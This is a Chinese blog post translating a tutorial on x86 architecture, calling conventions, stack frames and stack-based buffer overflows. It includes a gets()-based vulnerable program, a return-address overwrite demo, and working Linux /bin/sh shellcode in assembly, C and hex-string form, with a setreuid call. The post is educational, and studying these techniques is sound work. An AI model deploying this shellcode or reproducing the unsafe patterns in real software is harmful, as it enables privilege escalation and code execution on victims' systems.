taotaoyouarebaby

C/C++ and Buffer Overflow Topics

原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处、作者信息和本声明。否则将追究法律责任。http://blog.csdn.net/taotaoyouarebaby/article/details/24010649

之前翻译的一份文档，未逐字翻译，只翻译了主要知识点。复制到网页后，格式有点乱，提供PDF下载

英文原文网址：http://www.tenouk.com/cncplusplusbufferoverflow.html

缓冲区溢出由于病毒与蠕虫在互联网的大规模影响而为人熟知。C/C++程序因为缓冲区溢出，产生了许多安全问题。

1. 介绍

1.1. 产生缓冲区溢出的情况：

n 使用非类型安全的语言：C/C++，无数组边界检查和类型安全检查。

n 以不安全的方式操作或复制一个栈缓冲区。

eg:未正确使用strcpy(), gets(), scanf(), sprintf(), strcat()操作字符串，导致其它区域被复写。

n 编译器将缓冲区与重要的数据结构放的太近。

缓冲区与函数返回地址、virtual-table，局部变量，异常handler地址，函数指针都放在栈中相邻区域。使得可以通过缓冲区溢出，覆写以上重要的数据结构，从而引导程序执行恶意代码。

比如：如果将函数返回地址修改为恶意代码地址，那么在函数返回时就会执行相应的恶意代码。

1.2. 缓冲区溢出的后果：

www.cert.org Computer Emergency Response Team (CERT)

www.frsirt.com 代码示例

www.caida.org 病毒与蠕虫攻击的分析

n 程序崩溃。

n 运行恶意代码。

1.3. 缓冲区溢出的相关概念

缓冲区(Buffer)：一块内存区域，用于存储变量。有以下两种类型的缓冲区：

n 栈(Stack)：运行时隐式分配的，用于存储变量的一块内存区域。栈结构。

n 堆(Heap)：运行时显示分配的，用于存储变量的一块内存区域。堆结构。

溢出类型	描述
栈溢出	向一个缓冲区写入数据时，大于了分配给它的内存大小。很有可能复写栈中的其它重要数据，进而破坏栈结构。通常是由于未检查用户输入数据造成的。
堆溢出	与栈溢出类似。这类溢出不易被恶意利用。
数组溢出	数组下标为负，或大于最大下标。

2. X86架构基础——32位处理器

2.1. 基本的寄存器

寄存器种类
8个32位的通用寄存器
6个16位的段寄存器/段选择器	FS、GS在Itel32中引入的
1个32位的的标志寄存器(EFLAGS)
1个32位的指令寄存器（EIP）

通用寄存器的主要作用：

Register Name	Size (in bits)	Purpose
AL, AH/AX/EAX	8,8/16/32	也叫做累加器，主要用于保存算术运算结果和函数返回值。
BL, BH/BX/EBX	8,8/16/32	基址寄存器，指向DS段中的数据，用于保存程序的基址。
CL, CH/CX/ECX	8,8/16/3	计数器，通常用于循环计数和字符串操作
DL, DH/DX/EDX	8,8/16/32	通常用于I/O操作，也用于扩展EAX为64位。
SI/ESI	16/32	源地址寄存器。指向DS段中的数据，常被用来作为字符串和数组操作中的偏移量，保存数据源的地址。
DI/EDI	16/32	目的地址寄存器。指向ES段中的数据，常被用来作为字符串和数组操作中的偏移量，保存目标地址。
BP/EBP	16/32	栈基址指针寄存器。保存当前栈结构底部的地址，指向SS段中的数据，通常用于引用局部变量。
SP/ESP	16/32	栈顶指针寄存器（SS）。指向当前栈结构的顶部，也用于引用局部非静态变量。

2.2. 段寄存器

6个段寄存器保存了段地址的高16位（低位为0），由此定位内存中的段。4个数据段寄存器：DS, ES, FS, GS。为高效而安全的访问不同类型的数据提供了支持。

eg:可能的4种数据段

l 当前模块的数据

l 上层模块输出的数据

l 动态创建的数据

l 程序间共享的数据

X86段寄存器及其用处：

寄存器	位	目的
CS	16	代码段寄存器。代码段基地址(.text 段)，用于获取指令。	这些段寄存器用于将程序分成不同的部分。当程序执行时，各段的基地址赋给了段寄存器。通过段寄存和偏移量就可以操作程序的不同内存区域。
DS	16	数据段寄存器。数据的默认基地址(.data 段)，用于操作数据。。
ES	16	Extra段寄存器，用于字符串操作。
SS	16	栈段寄存器，栈段的基地址，配合SP, ESP, BP, EBP使用。
FS	16	通用的段寄存器
GS	16	通用的段寄存器

注：

l CS不能由程序设置。

l SS可以能和程序设置，从而一个程序可以有多个栈。

2.3. 内存模型

内存模型	支持的地址
flat 内存模型	near pointers (32 bits)
segmented内存模型	near pointers (32 bits)、far pointers (48 bits)
real-address模式内存模型	20bit bus

2.3.1. Flat内存模型

线性地址空间：一个程序的代码、数据和栈全都在该地址空间中。

2.3.2. Segmented内存模型

程序使用的内存被分为几个独立的地址空间（叫做段）。代码、数据和栈通常被分成单独的段。段模型的地址究竟与处理器的物理地址空间之间的映射：直接映射与分页机制（虚拟内存：段地址->虚拟内存地址->物理地址）

地址定位：

segment:offset

计算：

通常的段寄存器使用方式：

2.3.3. real-address mode （实模式）内存模型

用于兼容8086程序。内存分段，每段<=64KB，最大访存空间1M.

2.4. 标志寄存器

标志类型：状态、控制、系统标志

2.4.1. 状态标志：

Flag	Bit	Purpose
CF	0	进位标志。算术操作中，如果最高位发生进位或借位则被设置上，否则清空。该标志指示了无符号整型变量，在算术运算时的溢出情况。它也可用于多精度算术运算。
PF	2	Parity flag. Set if the least-significant byte of the result contains an even number of 1 bit, cleared otherwise.
AF	4	Adjust flag. Set if an arithmetic operation generates a carry or a borrow out of bit 3 of the result, cleared otherwise. This flag is used in Binary-Coded-Decimal (BCD) arithmetic.
ZF	6	Zero flag. Set if the result is zero, cleared otherwise.
SF	7	Sign flag. Set equal to the most-significant bit of the result, which is the sign bit of a signed integer. 0 indicates a positive value, 1 indicates a negative value.
OF	11	Overflow flag. Set if the integer result is too large a positive number or too small a negative number, excluding the sign bit, to fit in the destination operand, cleared otherwise. This flag indicates an overflow condition for signed-integer that is two’s complement arithmetic.

2.5. EIP指令地址寄存器

不能通过指令显式操作，只能利用程序流程控制指令操作，此外在调用函数时可以从函数栈中取得。

Register	size (bits)	Purpose
IP/EIP	16/32	保存下一条要执行的指令的地址。

2.6. 控制寄存器

32位的控制寄存器（CR0, CR1, CR2, CR3, and CR4）用于决定处理器的执行模式，以及当前所执行的任务的特性。

Control Register	Description
CR0	控制标识，用于控制处理器的执行模式与状态。
CR1	保留
CR2	包含产生缺页的线性地址。
CR3	包含页目录的基址（物理地址）和两个标识(PCD and PWT)。也叫：页目录基址寄存器(PDBR)。只有页目录基址只有高20位被指定，低12位设定为0。 When using the physical address extension, the CR3 register contains the base address of the page-directory-pointer table.
CR4	Contains a group of flags that enable several architectural extensions. In protected mode, the move-to-or-from-control-registers forms of the MOV instruction allow the control registers to be read (at any privilege level) or loaded (at privilege level 0 only). This restriction means that application programs (running at privilege levels 1, 2, or 3) are prevented from loading the control registers; however, application programs can read these registers.

2.7. 小端与大端

CD12AB90H

Big Endian	Little Endian
高位à低地址	高位à高地址
CD12AB90H	CD12AB90H

3. 汇编语言

通用规则：

l 源：内存、寄存器、常量

l 目标：内存、非段寄存器

l 源与目标不能同时为内存

l 源与目标必须具有同样大小。（位？）

指令分类：

Instruction Category	Meaning	Example
Data Transfer	move from source to destination	mov, lea, les, push, pop, pushf, popf
Arithmetic	arithmetic on integers	add, adc, sub, sbb, mul, imul, div, idiv, cmp, neg, inc, dec, xadd, cmpxchg
Floating point	arithmetic on floating point	fadd, fsub, fmul, div, cmp
Logical, Shift, Rotate and Bit	bitwise logic operations	and, or, xor, not, shl/sal, shr, sar, shld and shrd, ror, rol, rcr and rcl
Control transfer	conditional and unconditional jumps, procedure calls	jmp, jcc, call, ret, int, into, bound.
String	move, compare, input and output	movs, lods, stos, scas, cmps, outs, rep, repz, repe, repnz, repne, ins
I/O	输入输出	in, out
Conversion	汇编数据类型转换	movzx, movsx, cbw, cwd, cwde, cdq, bswap, xlat
Miscellaneous	manipulate individual flags, provide special processor services, or handle privileged mode operations	clc, stc, cmc, cld, std, cl, sti

4. 编译器、汇编器、链接器和加载器

处理流程：

4.1. 对象文件与可执行文件

对象文件格式：

Object File Format	Description
a.out	a.out格式是UNIX最初的执行文件格式。它由一部分组成：text, data, 和bss，分别表示代码, 已初始化数据, 和未初始化数据。不包含调试信息。
COFF	COFF (Common Object File Format) 格式由System V Release 3 (SVR3) Unix引入。 COFF 可以有多个部分，每部分以一下特定的header作为前缀，数量受限。支持调试，但调试信息有限。
ECOFF	COFF的变种。 ECOFF 为 Mips and Alpha 工作站设计.
XCOFF	XCOFF (eXtended COFF)，COFF sections, symbols, and line numbers are used，调试信息保存在.debug section (rather than the string table). The default name for an XCOFF executable file is a.out.
PE	PE(Portable Executable) 是由 COFF 和其它一些头信息构成。Windows 9x and NT使用PE做执行文件的格式。
ELF	ELF (Executable and Linking Format) 格式由 System V Release 4 (SVR4) Unix引入。 ELF与 COFF 相似，但没有COFF的一些限制。 ELF 被用于现代UNIX系统、GNU/Linux, Solaris 和Irix。也用于一些嵌入式系统。
SOM/ESOM	SOM (System Object Module) and ESOM (Extended SOM) is HP's object file and debug format

Section可能包含的内容：

l 代码

l 数据

l 动态链接信息

l 调试信息

l 符号表

l 重定位信息

l 注释

l 字符串表

l Note

所有可执行文件格式都包含的Section：编译器不同可能名称不同。

Section	Description
.text	包含程序指令，该程序的所有进程共享此部分。READ, EXECUTE权限。
.bss	BSS（Block Started by Symbol）包含未初始化的全局变量与静态变量。因为BSS包含的变量没有值，所有该部分并没有保存变量的映像，只是在对象文件中记录了运行时该部分需要的内存大小。也就是说，.BSS并没有占用实际的对象文件空间。
.data	包含已初始化的全局变量与静态变量，以及值。该部分往往是可执行文件中最大的。READ/WRITE权限。
.rdata	也叫做.rodata (read-only data) section. 包含常量与字符串常量。
.reloc	保存在加载时，重定位映像所需要的信息。
Symbol table	符号表：也就是变量/函数名，及其定义地址（相对于段的偏移量）。包含定位程序符号引用与定义时，所需要的信息。
Relocation records	Relocation 是连接符号引用与定义的过程。 relocation records用于链接器调整section内容。

4.2. Relocation Records

Relocation：分配加载地址，并按加载地址调整程序与数据的过程。在链接器对Object文件进行链接时，需要将所有Object文件中的相同section进行合并，并重新分配section的地址，从而合并为一个单独的可执行文件。进而导致可能需要修改原section中的部分symbol地址，使其满足新的section。

Relocation Records：是由编译器与汇率器创建的一个指针列表，保存在对象文件或可执行文件中。每一个条目表示了加载器重定位时需要修改的地址。用于支持程序的重定位。

4.3. Linker

使源文件单独编译成为可能。

4.3.1. 动态链接

对于C标准库中的函数，如果每个程序都单独复制一份，那么会造成很大的浪费。因此，将这类链接延迟到运行时进行。链接器只是将动态链接所需要知道的信息放到了可执行文件中：代码存在于哪个共享库中，使用哪个运行时链接器去查看和链接。

优点：

l 程序更小

l 使得动态升级程序成为可能。通过DLL

l 可以使程序有计划的自行加载当前需要的模块

l 与虚拟内存结合，使得进程可以共享同一份代码，大大节省了内存。

4.3.2. 静态链接

将程序依赖的代码全部链接进来。适用于程序运行时，环境中找不到需要链接的标准库版本。缺点是生成的文件很大。

eg: GCC静态链接

gcc -static filename.c -o executable-filename

4.4. 怎样使用共享的Object文件

4.4.1. ELF格式详情

简化了共享库实现，增强了运行时模块的动态加载。使用Hash表进行symbol查找。

ELF section列表：

//从低到高

.init - Startup

.text - String

.fini - Shutdown

.rodata - Read Only

.data - Initialized Data

.tdata - Initialized Thread Data

.tbss - Uninitialized Thread Data

.ctors - Constructors

.dtors - Destructors

.got - Global Offset Table

.bss - Uninitialized Data

简化的ELF文件格式：

Linking View ：Section，包含指令、数据、重定位信息、符号表、调试信息……

Execution View ：Segment，合并了对象文件中相关的Sections（也许是不同类型的Section，比如：.data与bbs被合并）为一个段。通常可执行代码与只读数据的section被合并为一个text段。其中有些段是需要加载的，但有些段是不需要加载的。

操作系统利用Program Header table提供的信息加载需要的段，并且可以利用这些段来生成共享的内存资源。

4.4.2. 进程加载

Linux进程将ELF格式文件从文件系统中加载。如果文件系统是块设备，则需要将代码与数据加载到主存中；如果文件系统是由内存映射的(eg:ROM/FLASH)，代码将在原地执行。如果相同的进程被加载了多次，那么它的代码将被共享。程序需要先加载，之后才能运行。

l 加载器Loader的加载过程：

1. 内存与接入权限验证：

操作系统读取程序文件中的头信息，之后验证type，access permissions and right, 内存需求，以及是否支持程序指令。验证文件是可执行文件，并计算内存需求。

2. 进程安装

1) 分配主存

2) 将地址空间从辅存复制到主存

3) 复制.text, .data 段到主存

4) 复制程序参数（如：命令行参数）到堆栈

5) 初始化寄存器：设置ESP指向栈顶，清空其它。

6) 跳到启动点：复制main()的参数，跳到main()函数。

l 简化的进程内存空间：

注意Stack与Heap的位置与增长方向。

4.4.3. 进程运行时的数据结构

内存分配的不同区域及含义：

区域	描述
Code/text segment	text段，保存指令，对应执行文件中的text section。任何时候，一个程序的指令在内存中只有一份。
Initialized data – data segment	包含初始化为非0值的静态变量和全局变量，对应执行文件中的data section。同一程序的每个进程拥有单独的data段。
Uninitialized data – bss segment	BSS 表示‘Block Started by Symbol’. 包含初始化为0值的静态变量和全局变量。进程私有。在ELF格式中，只有非0值变量才占用可执行文件的空间。
Heap	动态内存区域，由malloc(), calloc(), realloc() and new – C++等进行分配，并通过指针来操作。紧随bss段，Heap结束位置由break指令标记，大小可以通过brk(), sbrk()进行扩展（改变break指针）。向地址增大方向增长。
Stack	栈段保存局部非静态变量，如：局部非静态变量，临时信息与数据，函数参数，返回地址。当前调用函数时，对需要的信息进行压栈，返回时弹出栈。向地址减小方向增长（与Heap相反）。

当程序运行时，initializeddata, BSS and heap areas通常合并为data段，stack段和 code/text 段是与data段分离的。

Sections vs Segments：executable program segments andtheir locations.

Executable file section (disk file)	Address space segment	Program memory segment
.text	Text	Code
.data	Data	Initialized data
.bss	Data	BSS
-	Data	Heap
-	Stack	Stack

4.4.4. 进程

进程空间中位于stack与heap中间的区域是保留给共享代码的。

典型的C程序进程的内存布局(X86)：

4.4.5. 运行时链接器与共享库加载

对于共享代码的链接时间：

l 加载时动态链接：加载到内存时进行链接

l 运行动态链接：引用时才进行链接

链接器的链接步骤：

共享库：提供其依赖的其它库信息，需要的重定位操作，查找外部符号。

1. 链接器开始加载共享库依赖的其它库（递归进行）

2. 为每个库，执行需要的重定位操作和涉及到的符号查找操作。

3. 在共享库的.initsection注册的初始化函数将会被调用。

4.4.6. 动态地址翻译

动态定位/动态地址翻译提供了以下错觉：

l 每个进程都能使用使0到Max的地址空间

l 地址究竟是受保护的

l 进程可以认为其可以使用的内存（虚拟内存）大于物理内存大小。

地址翻译由内存管理单元（MMU：Memory Management Unit）与处理器协作完成。

5. C/C++函数操作

5.1. C函数

l 语法：

global_variables;

int main(int argc, char *argv[])

{

function_name(argument list);

function_return_address here

}

return_type function_name(parameter list)

{

local_variables;

static variables;

function’s code here

return something_or_nothing;

}

函数调用通过栈实现。发生函数调用时，需要的信息将被压栈，函数返回时将内容出栈。

l 栈的使用，进程地址空间与物理地址空间映射：

5.2. 函数调用约定（VC++）

描述了函数调用时栈的创建与销毁操作是如何进行的。不同的函数调用规则，方式不同。

5.2.1. 函数调用的一般过程：

还可参考：Win/Intel平台，函数调用过程的数据入栈顺序

1. 所有参数都被增宽到4字节 (onWin32, of course)，并被存储到合适的内存位置。通常的位置是栈，也可能是寄存器，由调用规则不同而不同。

2. 程序执行流程跳转到被调用函数（地址）

3. 进入函数后，ESI,EDI, EBX, EBP 寄存器值被保存到栈上，该操作由编译器自动生成的代码执行。

4. 函数指令被执行，返回值保存在EAX中。

5. 从栈上恢复ESI,EDI, EBX, EBP的值。该操作由编译器自动生成的代码执行。

6. 清除栈上保存的参数，也叫做清栈。该操作可以由调用者或被调用者执行，取决于调用规则。

5.2.2. 具体指定以下三种规则：

1. 函数参数的压栈顺序

2. 清栈是调用者还是被调用函数的任务

3. 函数名命名规则：编译器用来标识一个函数的名字

5.2.3. VC++支持的函数调用规则：

只有__cdecl是由调用者清栈。

keyword	Stack cleanup	Parameter passing
__cdecl	caller	函数参数从右到左进行压栈，调用者清栈。这是C/C++的默认调用方式。__cdecl调用方式产生的执行文件比__stdcall产生的要大，因为每个函数都需要清栈代码。但支持变长参数列表。
__stdcall	callee	也叫做 __pascal。函数参数从右到左进行压栈，被调用者清栈，需要一个函数原型（？）。Win32 API函数的标准调用方式（WINAPI）。
__fastcall	callee	参数优先考虑通过寄存器传递，其次是栈，被调用者清栈。最开头的两个<=32bit的参数分别由ECX, EDX传递，其它的按右到左的顺序压栈。
Thiscall	callee	C++成员函数的调用方式。压栈顺序从右到左，this指针由ECX传递。对于带可变参数列表的的成员函数，this指针的传递方式不同，this指针最后入栈。被调用者清栈。

5.2.4. 代码中指定函数调用规则：

// Borland and Microsoft

void __cdecl TestFunc(float a, char b, char c);

// GNU GCC

void TestFunc(float a, char b, char c) __attribute__((cdecl));

5.2.5. 清栈的汇编表示：

/* example of __cdecl */

push arg1

push arg2

call function

add ebp, 12 ;stack cleanup

/* example of __stdcall */

push arg1

push arg2

call function

/* no stack cleanup, it will be done by caller */

5.3. 链接符号与名称修饰

void CALLTYPE TestFunc(void)

Calling convention	extern "C" or .c file	.cpp, .cxx	Remarks
__cdecl	_TestFunc	?TestFunc@@ZAXXZ	参数数目并不重要，因为调用者负责创建和销毁栈。
__fastcall	@TestFunc@N	?TestFunc@@YIXXZ	N—参数的byte数，0表示void。
__stdcall	_TestFunc@N	?TestFunc@@YGXXZ	N—参数的byte数，0表示void。

示例：C语言

Function declaration/prototype	Decorated name
void __cdecl TestFunc(void);	_TestFunc
void __cdecl TestFunc(int x);	_TestFunc
void __cdecl TestFunc(int x, int y);	_TestFunc
void __stdcall TestFunc(void);	_TestFunc@0
void __stdcall TestFunc(int x);	_TestFunc@4
void __stdcall TestFunc(int x, int y);	_TestFunc@8
void __fastcall TestFunc(void);	@TestFunc@0
void __ fastcall TestFunc(int x);	@TestFunc@4
void __ fastcall TestFunc(int x, int y);	@TestFunc@8

5.4. 函数调用栈

函数调用中涉及的寄存器：

Register	Description
ESP – Stack Pointer	通过PUSH, POP, CALL,RET来修改，总是指向当前栈的栈顶。
EBP – Base Pointer	也叫做： Frame Pointer. 直接通过偏移量操作参数与局部变量。
EIP – Instruction Pointer	下一条指令的地址。

函数调用的栈：

6. Stack

6.1. 处理器的Stack Frame布局

不同操作系统可以有所不同。由上图可知，如果缓冲区溢出，可以覆写其它重要的数据结构。

6.1.1. Win/Intel平台，函数调用过程的数据入栈顺序

参考：函数调用的一般过程：

1. 在进行函数调用之前，参数被压栈（右->左）

2. 函数返回地址（执行call指令时的EIP值），由call指令入栈。

3. 栈帧指针(EBP)入栈。保存之前的栈帧地址。

4. 如果函数包含异常处理结构(try/catch, SEH)，编译器添加的异常处理上将入栈。

5. 分配局部变量、缓冲区空间

6. 最后，被调用者将EBX, ESI,EDI寄存器值被入栈。对于Linux/Intel，这一步发生在第四步之后。

6.2. 处理器的栈操作

指令	描述
PUSH	*--SP = src.
POP	dst = *SP++
PUSHAD	将通用寄存器值入栈。
POPAD	将通用寄存器值出栈。
PUSHFD	将EFLAGS寄存器值入栈。
POPFD	将EFLAGS寄存器值出栈。

6.3. 函数调用过程及栈的分析

6.3.1. 程序源码

#include

//MyFunc(7, ‘8’);

int MyFunc(int parameter1, char parameter2)

{

int local1 = 9;

char local2 = ‘Z’;

return 0;

}

6.3.2. 与函数调用和栈操作相关的汇编代码，分析

在main函数中调用MyFunc函数：

;in main

MyFunc(7, '8');

01281B1E push 38h ; ‘8’入栈, 从右往左入栈

01281B20 push 7 ; 7入栈

01281B22 call @ILT+460(_MyFunc) (12811D1h) ;调用函数，函数返回地址(EIP：01281B27 )入栈

01281B27 add esp,8 ; 将MyFunc函数栈清空

函数符号表及跳转指令：

@ILT+460(_MyFunc): ;函数修饰名

12811D1 jmp MyFunc (01281490h)

MyFunc函数：

int MyFunc(int parameter1, char parameter2)

{

01281490 push ebp ;保存调用者的EBP，位于MyFunc的[EBP+0]位置

01281491 mov ebp,esp ;ESP的值成为MyFunc的EBP值，ESP,EBP指向相同位置。

01281493 sub esp,0D8h ;减去216字节，为变量和缓冲区分配空间。ESP位于[EBP-216]的位置

01281499 push ebx ;push ebx at [EBP-220]

0128149A push esi ;push esi at [EBP-224]

0128149B push edi ;push edi at [EBP-228]

//...

return 0;

012814B9 xor eax,eax ;清空EAX,返回值为0

}

012814BB pop edi ;恢复edi from [EBP-228]

012814BC pop esi ;恢复esi from [EBP-224]

012814BD pop ebx ;恢复ebx from [EBP-220]

012814BE mov esp,ebp ;清空局部变量与缓冲区空间，ESP, EBP指向相同位置

012814C0 pop ebp ;恢复调用者的EBP

012814C1 ret ;将返回地址(01281B27H)从栈(MyFunc的[EBP+4]位置)载入EIP中,

;执行后继指令

//back to main

01281B27 add esp,8 ; 清空函数参数，7和’8’共8byte（参数都扩充为了4byte）

注意：栈帧大小必须是栈宽度(stackslot)的整数倍。所以栈宽为32bit的栈，5字节的数据实际占用8字节内存，10字节数据实际占用12字节内存。

6.3.3. 函数调用栈内存布局

EBP寄存器被用来与偏移一起索引栈上的数据。

重要数据结构	栈地址
函数最左边的参数	[EBP+8]
函数返回地址/旧EIP	[EBP+4]
旧栈帧指针/旧EBP	[EBP+0]
第一个局部变量	[EBP-4]
EBX, ESI, EDI	ESP, ESP-4, ESP-8

6.3.4. 定位返回地址

int main(int argc, char *argv[ ])

{

char buffer[12];

strcpy(buffer, argv[1]);

return 0;

}

l 使用gcc2.96或更低版本的栈内存布局

函数返回地址位置：&frist_local_var+ 4(EBP) + 4(ret)

l 使用gcc2.96或更高版本的栈内存布局

函数返回地址位置：&first_local_var+ (dummy) + 4(EBP) + 4(ret)，根据dummy大小调整偏移量

6.3.5. 示例：修改返回地址

void hello()

{

printf("hello\n");

return ;

}

void stackOverflow(int a,int b)

{

int buf[2] = {1,2};

int *p;

p = &a - 1; //函数返回地址

*p = (int)hello;

return ;

}

int main(void)

{

stackOverflow(1, 2);

getchar();

return EXIT_SUCCESS;

}

// 运行结果： hello

6.4. 寄存器使用

通用寄存器

l ESP, EBP用于管理函数进出；

l EBX, ESI, EDI必须在进入函数后入栈保存旧值；

l ECX, EDX, EAX只有在需要时，才入栈保存旧值。

进入函数时常见的代码片段：

push ebx

push esi

push edi

; here should be codes that uses

; the EBX, ESI and EDI

;

pop edi

pop esi

pop ebx

ret

6.4.1. GCC与C调用规则——标准栈帧

Steps	32-bit code/platform
创建标准栈帧，为局部变量与缓冲区分配32byte的空间。保存寄存器值。	push ebp mov ebp, esp sub esp, 0x20 push edi push esi ...
恢复寄存器值，销毁标准栈帧	... pop esi pop edi mov esp, ebp pop ebp ret
栈的宽度	32 bits
栈帧槽的位置	... [ebp + 12] [ebp + 8] [ebp + 4] [ebp + 0] [ebp – 4] ...

6.4.2. GCC与C调用规则——返回值

C函数返回值存放位置：

Size	32-bit code/platform
8-bit return value	AL
16-bit return value	AX
32-bit return value	EAX
64-bit return value	EDX:EAX
128-bit return value	hidden pointer

6.4.3. GCC与C调用规则——保存寄存器值

被调用者需要保存的寄存器：

EBX, EDI, ESI, EBP, DS, ES, SS

不需要保存的寄存器：

EAX, ECX, EDX, FS, GS, EFLAGS, floating pointregisters

一些操作系统中，FS, GS段寄存器被用于保存线程局部存储空间地址，如果你要修改它们，那也需要保存。

7. 基于栈的缓冲区溢出与利用

下面的测试代码主要用于实现以下目的：覆写栈上保存的EBP和返回地址。通过gets()这个不安全的函数实现以上数据的覆写。

/* test buffer program */

#include

void Test()

{

char buff[4];

printf("Some input: ");

gets(buff);

puts(buff);

}

int main(int argc, char *argv[ ])

{

Test();

return 0;

}

输入12个A：

在实际的攻击中，会利用有意义的地址（攻击代码所在地址）对返回地址进行覆写。

7.1. 缓冲区溢出攻击中的目标

l 注入攻击代码（命令行输入、socket输入，或其它高级方法）

l 改变程序正常执行路径（通过覆写返回地址实现），执行攻击代码。

7.2. 基于栈的缓冲区溢出利用的变异

l 利用程序自身存在的缓冲区溢出漏洞，欺骗函数将大于缓冲区的数据写入，从而覆写返回地址，将执行路径导向攻击代码。这种方式可以通过多种途径阻止。

l 利用程序使用的共享库中存在的缓冲区溢出漏洞，覆写返回地址。

缓冲区溢出攻击时，攻击时必须要大致的知道返回地址的所在位置。

利用不可执行栈（不能在栈上执行代码）就可以阻上大部分这类型的攻击。

7.2.1. 更高级更新的攻击手段：覆写其它地址

l 函数指针

l ELF文件中的GOT指针(.got)

l ELF文件中的DTORS块(.dtors)

阻止手段：随机化以下地址

l 共享库

l 栈

l 程序堆

8. Shellcode

8.1. 基本概念

产生shell/命令行环境代码，缓冲区溢出时覆写的返回地址，通常就是shellcode代码所在的地址。而shellcode通常是提前编译，并将其二进制代码利用char数组保存为全局变量。当程序由修改的返回地址转到该全局变量所在位置时，就能执行该代码，从而创建一个shell环境。利用得到的shell环境可以执行攻击命令。

广义是讲，只要通过上述方式运行另一个程序的代码都叫做shellcode。

通常目标：通过有较高权限的程序，使得创建的shell具有root权限（在Windows中就是管理员权限或更高的LocalSystem权限）。

8.1.1. 通常的缓冲区溢出攻击涉及两个主要方面：

l 缓冲区溢出漏洞的利用技术

l 获得高权限的运行环境(playload)，用于运行任意代码

8.1.2. 使程序运行shellcode的技术：

l 基于栈的缓冲区溢出

l 基于堆的缓冲区溢出

l 整数溢出

l 格式化字符串

l 竞争条件

l 内存污染

8.1.3. Shellcode元素

shellcode必须是二进制形式的代码。不能含有’\0’, 0X0A, 0X0D, ‘\’, nop。可以使用Encoder工具消除它们。

写的时候需要考虑：处理器，操作系统，网络防护软件（如：防火墙），入侵检测系统（IDS：Intrusion DetectionSystem）

8.2. Shellcode的不同表现形式

8.2.1. 汇编

#a very simple assembly (AT&T/Linux) program for spawning a shell

.section .data

.section .text

.globl _start

_start:

xor %eax, %eax

mov $70, %al #setreuid is syscall 70

xor %ebx, %ebx

xor %ecx, %ecx

int $0x80

jmp ender

starter:

popl %ebx #get the address of the string

xor %eax, %eax

mov %al, 0x07(%ebx) #put a NULL where the N is in the string

movl %ebx, 0x08(%ebx) #put the address of the string

#to where the AAAA is

movl %ebx, 0x0c(%ebx) #put 4 null bytes into where the BBBB is

mov $11, %al #execve is syscall 11

lea 0x08(%ebx), %ecx #load the address of where the AAAA was

lea 0x0c(%ebx), %edx #load the address of the NULLS

int $0x80 #call the kernel

ender:

call starter

.string "/bin/shNAAAABBBB"

8.2.2. C语言

#include

int main(int argc, char*argv[ ])

{

char *shell[2];

shell[0] = "/bin/sh";

shell[1] = NULL;

execve(shell[0], shell, NULL);

return 0;

}

8.2.3. 字符串

char shellcode[ ] = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50

\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

8.3. 创建可移植的shellcode

要创建可移植的shellcode，代码中就不能出现硬编码的地址（比如：字符串参数地址）。

.section .data

#only use register here...

.section .text

.globl _start

jmp dummy

_start:

#pop register, so we know the string location

#Here we have assembly instructions which will use the string

dummy:

call _start

.string "Simple String"

dummy标签中使用call调用_start标签，主要是为了利用call会将其后的指令地址(EIP)作为返回地址压入栈中，这样一来就可以在_start标签中，从栈上弹出字符串地址。如下图所示：

图表1获取字符串地址的技巧

利用这种方法，可以将多个.string放到call指令之后，利用相对位置就可以得到.string数据的位置。

9. 附录

9.1. 中英名词对照

stack frame/frame：栈帧，栈中一个函数占据的空间。

section：块

function decorated name：函数修饰名，编译器用来标识一个函数的名称，也就是函数ID（唯一性）。

non-executable stack：不可执行栈，栈上不能执行代码。

你可能感兴趣的:(编程语言,读书笔记)

ROS2 细节知识学习儒雅芝士 ROS2系列机器人 c++linux
1.rosidl_generate_interfaces()在ROS2中，rosidl_generate_interfaces是一个关键的构建工具功能。它主要用于从接口定义文件（如.msg消息文件、.srv服务文件和.action动作文件）生成不同编程语言（如C++、Python等）可以使用的接口代码。这些接口是ROS2中节点间通信的基础，确保了数据在不同组件之间能够准确、高效地传递。在构建系统中
golang网络编程之UDP可靠传输协议QUIC SMILY12138 网络 golang
Golang是一种高效、简洁的编程语言，在网络编程中，Golang通过其强大的标准库支持QUIC协议的UDP可靠传输。QUIC（QuickUDPInternetConnections）是一个基于UDP协议的可靠传输协议，它通过使用TLS1.3实现了端到端加密。在Golang中，我们可以使用quic-go包来实现QUIC协议的UDP可靠传输。下面是一个简单的例子：packagemainimport(
Node.js NativeAddon 构建工具：node-gyp 安装与配置完全指南 P7进阶路面试学习路线阿里巴巴 node.js
Node.jsNativeAddon构建工具：node-gyp安装与配置完全指南node-gypNode.jsnativeaddonbuildtool[这里是图片001]项目地址:https://gitcode.com/gh_mirrors/no/node-gyp项目基础介绍及主要编程语言Node.jsNativeAddon构建工具（node-gyp）是一个基于Node.js的跨平台命令行工具，专
使用Python进行3D游戏开发 2301_79366332 python 3d pygame Python
Python是一种功能强大且易于学习的编程语言，它也可以用于开发3D游戏。虽然Python在游戏开发方面可能不如其他专门的游戏引擎和语言，但它仍然提供了许多库和工具，可以帮助您构建简单的3D游戏。在本文中，我们将探讨如何使用Python进行基本的3D游戏开发。安装所需的库要开始使用Python进行3D游戏开发，您需要安装一些必要的库。其中，最重要的是Pygame库和PyOpenGL库。Pygame
通过Python编程语言实现“机器学习”小项目教程案例胡萝卜不甜机器学习 python 机器学习开发语言
1.Python与机器学习概述1.1Python语言特点Python是一种广泛使用的高级编程语言，具有简洁、易读、易学的特点，这使得它成为初学者和专业人士的首选语言之一。简洁性：Python的语法简洁明了，减少了代码量，提高了开发效率。例如，与其他语言相比，Python可以用更少的代码实现相同的功能，这使得代码更容易编写和维护。易读性：Python的代码风格类似于英语，易于理解和阅读。这种易读性使
ZXing库 -- 生成二维码蓝田～ python 开发语言
引言二维码（QRCode）因其高密度的数据存储能力和易于扫描的特性，在现代社会中得到了广泛应用。ZXing是一个开源的二维码生成与读取库，它支持多种编程语言，包括Java。本指南将详细介绍如何在Java项目中使用ZXing库来生成带有透明背景的二维码。准备ZXing库com.google.zxingcore3.4.1com.google.zxingjavase3.4.1生成二维码编写代码packa
MATLAB中的abs函数及其用法程序编码实践周师傅 matlab 开发语言编程
